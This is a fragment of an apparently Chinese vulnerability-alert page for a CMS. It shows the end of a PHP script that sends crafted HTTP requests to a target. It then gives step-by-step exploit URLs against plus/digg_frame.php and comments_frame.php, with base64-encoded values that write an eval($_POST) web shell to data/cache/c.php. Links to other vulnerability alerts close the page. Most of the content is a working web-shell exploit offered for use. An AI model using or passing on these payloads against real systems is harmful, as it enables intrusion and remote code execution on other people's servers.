$message .= “Content-Length: ”.strlen($cmd).“rn”;
$message .= “Connection: Closernrn”;
$message .= $cmd;
$fp = fsockopen($host, 80);
if(!$fp){
echo “nConnect to host Error”;
}
fputs($fp, $message);
$back = '';
while (!feof($fp))
$back .= fread($fp, 1024);
fclose($fp);
return $back;
}
?>
利用方法
复制代码
xxx.com//uploads/plus/digg_frame.php?action=good&id=1024%651024&mid=*/fputs(fopen(base64_decode(ZGF0YS9jYWNoZS9jLnBocA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4));?>
复制代码
xxx.com/uploads/plus/comments_frame.php?id=2&needCode=/../../../data/mysql_error_trace
在data/cache下生成c.php
★iShowMusic V1.2 写入shell漏洞漏洞预警
★Android Linux Kernel 2.6本地DoS漏洞预警
★xheditor编辑器upload.php畸形文件上传漏洞漏洞预警
文档为doc格式
